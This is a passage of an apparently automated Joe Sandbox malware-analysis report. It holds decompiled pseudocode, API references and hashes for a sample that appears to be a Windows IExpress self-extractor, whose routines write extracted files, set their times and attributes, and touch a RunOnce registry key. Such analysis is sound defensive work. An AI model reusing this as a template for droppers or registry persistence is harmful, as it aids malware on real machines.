                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00A9538C,?,?,00A9538C), ref: 00A92020
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                                                                                                                        • API String ID: 849931509-702805525
                                                                                                                                                                                                        • Opcode ID: 1b9a31da2d4186c0842ea8758fdef947e2870fc1ab8b700e40246f2b5142e5bd
                                                                                                                                                                                                        • Instruction ID: 143594f1e4402c041475459e99bee38d147c74548b5dab5d26b20b65bf4c800c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b9a31da2d4186c0842ea8758fdef947e2870fc1ab8b700e40246f2b5142e5bd
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 40E01A30750218BBDB218BD0AC0AF697AA9F711741F100197B905A0060EF655E15D645
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00A94CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				long _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        				long _t35;
                                                                                                                                                                                                        				long _t36;
                                                                                                                                                                                                        				struct HWND__* _t37;
                                                                                                                                                                                                        				long _t38;
                                                                                                                                                                                                        				long _t39;
                                                                                                                                                                                                        				long _t41;
                                                                                                                                                                                                        				long _t44;
                                                                                                                                                                                                        				long _t45;
                                                                                                                                                                                                        				long _t46;
                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                        				long _t51;
                                                                                                                                                                                                        				char* _t58;
                                                                                                                                                                                                        				long _t59;
                                                                                                                                                                                                        				char* _t63;
                                                                                                                                                                                                        				long _t64;
                                                                                                                                                                                                        				CHAR* _t71;
                                                                                                                                                                                                        				CHAR* _t74;
                                                                                                                                                                                                        				int _t75;
                                                                                                                                                                                                        				signed int _t76;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t69 = __edx;
                                                                                                                                                                                                        				_t29 =  *0xa98004; // 0x6298f871
                                                                                                                                                                                                        				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                        				_v8 = _t30;
                                                                                                                                                                                                        				_t75 = _a8;
                                                                                                                                                                                                        				if( *0xa991d8 == 0) {
                                                                                                                                                                                                        					_t32 = _a4;
                                                                                                                                                                                                        					__eflags = _t32;
                                                                                                                                                                                                        					if(_t32 == 0) {
                                                                                                                                                                                                        						_t33 = E00A94E99(_t75);
                                                                                                                                                                                                        						L35:
                                                                                                                                                                                                        						return E00A96CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t35 = _t32 - 1;
                                                                                                                                                                                                        					__eflags = _t35;
                                                                                                                                                                                                        					if(_t35 == 0) {
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						_t33 = 0;
                                                                                                                                                                                                        						goto L35;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t36 = _t35 - 1;
                                                                                                                                                                                                        					__eflags = _t36;
                                                                                                                                                                                                        					if(_t36 == 0) {
                                                                                                                                                                                                        						_t37 =  *0xa98584; // 0x0
                                                                                                                                                                                                        						__eflags = _t37;
                                                                                                                                                                                                        						if(_t37 != 0) {
                                                                                                                                                                                                        							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t54 = 0xa991e4;
                                                                                                                                                                                                        						_t58 = 0xa991e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t38 =  *_t58;
                                                                                                                                                                                                        							_t58 =  &(_t58[1]);
                                                                                                                                                                                                        							__eflags = _t38;
                                                                                                                                                                                                        						} while (_t38 != 0);
                                                                                                                                                                                                        						_t59 = _t58 - 0xa991e5;
                                                                                                                                                                                                        						__eflags = _t59;
                                                                                                                                                                                                        						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                        						_t73 =  &(_t71[1]);
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t39 =  *_t71;
                                                                                                                                                                                                        							_t71 =  &(_t71[1]);
                                                                                                                                                                                                        							__eflags = _t39;
                                                                                                                                                                                                        						} while (_t39 != 0);
                                                                                                                                                                                                        						_t69 = _t71 - _t73;
                                                                                                                                                                                                        						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                        						__eflags = _t30 - 0x104;
                                                                                                                                                                                                        						if(_t30 >= 0x104) {
                                                                                                                                                                                                        							L3:
                                                                                                                                                                                                        							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                        							goto L35;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t69 = 0xa991e4;
                                                                                                                                                                                                        						_t30 = E00A94702( &_v268, 0xa991e4,  *(_t75 + 4));
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(__eflags == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t41 = E00A9476D( &_v268, __eflags);
                                                                                                                                                                                                        						__eflags = _t41;
                                                                                                                                                                                                        						if(_t41 == 0) {
                                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_push(0x180);
                                                                                                                                                                                                        						_t30 = E00A94980( &_v268, 0x8302); // executed
                                                                                                                                                                                                        						_t75 = _t30;
                                                                                                                                                                                                        						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                        						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t30 = E00A947E0( &_v268);
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0xa993f4 =  *0xa993f4 + 1;
                                                                                                                                                                                                        						_t33 = _t75;
                                                                                                                                                                                                        						goto L35;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t44 = _t36 - 1;
                                                                                                                                                                                                        					__eflags = _t44;
                                                                                                                                                                                                        					if(_t44 == 0) {
                                                                                                                                                                                                        						_t54 = 0xa991e4;
                                                                                                                                                                                                        						_t63 = 0xa991e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t45 =  *_t63;
                                                                                                                                                                                                        							_t63 =  &(_t63[1]);
                                                                                                                                                                                                        							__eflags = _t45;
                                                                                                                                                                                                        						} while (_t45 != 0);
                                                                                                                                                                                                        						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                        						_t64 = _t63 - 0xa991e5;
                                                                                                                                                                                                        						__eflags = _t64;
                                                                                                                                                                                                        						_t69 =  &(_t74[1]);
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t46 =  *_t74;
                                                                                                                                                                                                        							_t74 =  &(_t74[1]);
                                                                                                                                                                                                        							__eflags = _t46;
                                                                                                                                                                                                        						} while (_t46 != 0);
                                                                                                                                                                                                        						_t73 = _t74 - _t69;
                                                                                                                                                                                                        						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                        						__eflags = _t30 - 0x104;
                                                                                                                                                                                                        						if(_t30 >= 0x104) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t69 = 0xa991e4;
                                                                                                                                                                                                        						_t30 = E00A94702( &_v268, 0xa991e4,  *(_t75 + 4));
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                        						_t30 = E00A94C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						E00A94B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                        						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                        						__eflags = _t50;
                                                                                                                                                                                                        						if(_t50 != 0) {
                                                                                                                                                                                                        							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                        							__eflags = _t51;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t51 = 0x80;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t33 = 1;
                                                                                                                                                                                                        							goto L35;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t30 = _t44 - 1;
                                                                                                                                                                                                        					__eflags = _t30;
                                                                                                                                                                                                        					if(_t30 == 0) {
                                                                                                                                                                                                        						goto L3;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_a4 == 3) {
                                                                                                                                                                                                        					_t30 = E00A94B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L3;
                                                                                                                                                                                                        			}































                                                                                                                                                                                                        0x00a94dfc
                                                                                                                                                                                                        0x00a94dfe
                                                                                                                                                                                                        0x00a94dff
                                                                                                                                                                                                        0x00a94dff
                                                                                                                                                                                                        0x00a94e03
                                                                                                                                                                                                        0x00a94e08
                                                                                                                                                                                                        0x00a94e0a
                                                                                                                                                                                                        0x00a94e0f
                                                                                                                                                                                                        0x00a94d03
                                                                                                                                                                                                        0x00a94d03
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94d03
                                                                                                                                                                                                        0x00a94e18
                                                                                                                                                                                                        0x00a94e20
                                                                                                                                                                                                        0x00a94e25
                                                                                                                                                                                                        0x00a94e27
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94e33
                                                                                                                                                                                                        0x00a94e38
                                                                                                                                                                                                        0x00a94e3a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94e40
                                                                                                                                                                                                        0x00a94e51
                                                                                                                                                                                                        0x00a94e56
                                                                                                                                                                                                        0x00a94e5b
                                                                                                                                                                                                        0x00a94e5e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94e6a
                                                                                                                                                                                                        0x00a94e6f
                                                                                                                                                                                                        0x00a94e71
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94e77
                                                                                                                                                                                                        0x00a94e7d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94e7d
                                                                                                                                                                                                        0x00a94d25
                                                                                                                                                                                                        0x00a94d25
                                                                                                                                                                                                        0x00a94d28
                                                                                                                                                                                                        0x00a94d36
                                                                                                                                                                                                        0x00a94d3b
                                                                                                                                                                                                        0x00a94d40
                                                                                                                                                                                                        0x00a94d40
                                                                                                                                                                                                        0x00a94d42
                                                                                                                                                                                                        0x00a94d43
                                                                                                                                                                                                        0x00a94d43
                                                                                                                                                                                                        0x00a94d47
                                                                                                                                                                                                        0x00a94d4a
                                                                                                                                                                                                        0x00a94d4a
                                                                                                                                                                                                        0x00a94d4c
                                                                                                                                                                                                        0x00a94d4f
                                                                                                                                                                                                        0x00a94d4f
                                                                                                                                                                                                        0x00a94d51
                                                                                                                                                                                                        0x00a94d52
                                                                                                                                                                                                        0x00a94d52
                                                                                                                                                                                                        0x00a94d56
                                                                                                                                                                                                        0x00a94d5b
                                                                                                                                                                                                        0x00a94d5d
                                                                                                                                                                                                        0x00a94d62
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94d67
                                                                                                                                                                                                        0x00a94d6f
                                                                                                                                                                                                        0x00a94d74
                                                                                                                                                                                                        0x00a94d76
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94d7c
                                                                                                                                                                                                        0x00a94d84
                                                                                                                                                                                                        0x00a94d89
                                                                                                                                                                                                        0x00a94d8b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94d94
                                                                                                                                                                                                        0x00a94d99
                                                                                                                                                                                                        0x00a94d9e
                                                                                                                                                                                                        0x00a94da1
                                                                                                                                                                                                        0x00a94daa
                                                                                                                                                                                                        0x00a94daa
                                                                                                                                                                                                        0x00a94da3
                                                                                                                                                                                                        0x00a94da3
                                                                                                                                                                                                        0x00a94da3
                                                                                                                                                                                                        0x00a94db5
                                                                                                                                                                                                        0x00a94dbb
                                                                                                                                                                                                        0x00a94dbd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94dc3
                                                                                                                                                                                                        0x00a94dc5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94dc5
                                                                                                                                                                                                        0x00a94dbd
                                                                                                                                                                                                        0x00a94d2a
                                                                                                                                                                                                        0x00a94d2a
                                                                                                                                                                                                        0x00a94d2d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94d2d
                                                                                                                                                                                                        0x00a94cf8
                                                                                                                                                                                                        0x00a94cfd
                                                                                                                                                                                                        0x00a94d02
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00A94DB5
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00A94DDD
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFileItemText
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                        • API String ID: 3625706803-2312194364
                                                                                                                                                                                                        • Opcode ID: 76bc4a8c8058999d8c414e79e96ffb87cc1ae4317e08b7364155576e0fb16012
                                                                                                                                                                                                        • Instruction ID: 7d5c163f15a9a508d275863a8d3aa242725cdfbc00f1e489e74d0f9e26e18bc4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 76bc4a8c8058999d8c414e79e96ffb87cc1ae4317e08b7364155576e0fb16012
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B41003A3002059ACF259F68DA44EF677E5AF4D304F148669E886A7285DE31DE4BC790
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A94C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                        				struct _FILETIME _v12;
                                                                                                                                                                                                        				struct _FILETIME _v20;
                                                                                                                                                                                                        				FILETIME* _t14;
                                                                                                                                                                                                        				int _t15;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t21 = __ecx * 0x18;
                                                                                                                                                                                                        				if( *((intOrPtr*)(_t21 + 0xa98d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t14 =  &_v12;
                                                                                                                                                                                                        					_t15 = SetFileTime( *(_t21 + 0xa98d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                        					if(_t15 == 0) {
                                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • DosDateTimeToFileTime.KERNEL32 ref: 00A94C54
                                                                                                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A94C66
                                                                                                                                                                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 00A94C7E
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Time$File$DateLocal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2071732420-0
                                                                                                                                                                                                        • Opcode ID: 296e14f7f4d6fded04cb61a5ac6d1dd5102d1d91b270b354efe2e7ad19698295
                                                                                                                                                                                                        • Instruction ID: 9ac5585b6bc64897e1954f4fdb973bebe1c85b6246c9216b11d857209d89f686
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 296e14f7f4d6fded04cb61a5ac6d1dd5102d1d91b270b354efe2e7ad19698295
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32F0907271120CAF9F64DFB4CC49DBB77ECEB18240B44052BA815C1150EA30D915C7A0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E00A9487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                        				void* _t7;
                                                                                                                                                                                                        				CHAR* _t11;
                                                                                                                                                                                                        				long _t18;
                                                                                                                                                                                                        				long _t23;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t11 = __ecx;
                                                                                                                                                                                                        				asm("sbb edi, edi");
                                                                                                                                                                                                        				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                        				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                        					asm("sbb esi, esi");
                                                                                                                                                                                                        					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                        						asm("sbb esi, esi");
                                                                                                                                                                                                        						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t23 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                        				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                        					return _t7;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E00A9490C(_t11);
                                                                                                                                                                                                        					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00A94A23,?,00A94F67,*MEMCAB,00008000,00000180), ref: 00A948DE
                                                                                                                                                                                                        • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00A94F67,*MEMCAB,00008000,00000180), ref: 00A94902
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                        • Opcode ID: f18fc2a2f5b31109e724c2dc69cd4dad46ad8c3f127d662d937c1cd737d1d458
                                                                                                                                                                                                        • Instruction ID: c6ae5ec2a510f206636691f70e17665d5bbcd499bffd3e68ab6cd4f8c984c977
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f18fc2a2f5b31109e724c2dc69cd4dad46ad8c3f127d662d937c1cd737d1d458
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 67014BA3F1257026F72481694C88FB7559CCB9A735F2B4336FDAAE71D1D5644C0681E0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00A94AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				int _t12;
                                                                                                                                                                                                        				signed int _t14;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				struct HWND__* _t21;
                                                                                                                                                                                                        				signed int _t24;
                                                                                                                                                                                                        				signed int _t25;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 =  *0xa9858c; // 0x268
                                                                                                                                                                                                        				_t9 = E00A93680(_t20);
                                                                                                                                                                                                        				if( *0xa991d8 == 0) {
                                                                                                                                                                                                        					_push(_t24);
                                                                                                                                                                                                        					_t12 = WriteFile( *(0xa98d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						_t25 = _a12;
                                                                                                                                                                                                        						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        							_t14 =  *0xa99400; // 0xbebfe
                                                                                                                                                                                                        							_t15 = _t14 + _t25;
                                                                                                                                                                                                        							 *0xa99400 = _t15;
                                                                                                                                                                                                        							if( *0xa98184 != 0) {
                                                                                                                                                                                                        								_t21 =  *0xa98584; // 0x0
                                                                                                                                                                                                        								if(_t21 != 0) {
                                                                                                                                                                                                        									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xa993f8, 0);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return _t25;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					return _t9 | 0xffffffff;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00A93680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00A9369F
                                                                                                                                                                                                          • Part of subcall function 00A93680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A936B2
                                                                                                                                                                                                          • Part of subcall function 00A93680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A936DA
                                                                                                                                                                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00A94B05
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1084409-0
                                                                                                                                                                                                        • Opcode ID: cabd5539252d18265baf707039a089862e4ec9785116a741bce7e073265a8f9d
                                                                                                                                                                                                        • Instruction ID: 78e1f8e8d42108229a17b37f327fcca7a6a76e209e45bfdca1810a4c7d2c62f4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cabd5539252d18265baf707039a089862e4ec9785116a741bce7e073265a8f9d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E4012931300215ABEB15CFA8DC45FA677A9AB49725F14822AE9399A1E0CF70D813CB90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A9658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                        				intOrPtr _t4;
                                                                                                                                                                                                        				char* _t6;
                                                                                                                                                                                                        				char* _t8;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				char* _t16;
                                                                                                                                                                                                        				intOrPtr* _t17;
                                                                                                                                                                                                        				void* _t18;
                                                                                                                                                                                                        				char* _t19;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t16 = __ecx;
                                                                                                                                                                                                        				_t10 = __edx;
                                                                                                                                                                                                        				_t17 = __ecx;
                                                                                                                                                                                                        				_t1 = _t17 + 1; // 0xa98b3f
                                                                                                                                                                                                        				_t12 = _t1;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t4 =  *_t17;
                                                                                                                                                                                                        					_t17 = _t17 + 1;
                                                                                                                                                                                                        				} while (_t4 != 0);
                                                                                                                                                                                                        				_t18 = _t17 - _t12;
                                                                                                                                                                                                        				_t2 = _t18 + 1; // 0xa98b40
                                                                                                                                                                                                        				if(_t2 < __edx) {
                                                                                                                                                                                                        					_t19 = _t18 + __ecx;
                                                                                                                                                                                                        					if(_t19 > __ecx) {
                                                                                                                                                                                                        						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                        						if( *_t8 != 0x5c) {
                                                                                                                                                                                                        							 *_t19 = 0x5c;
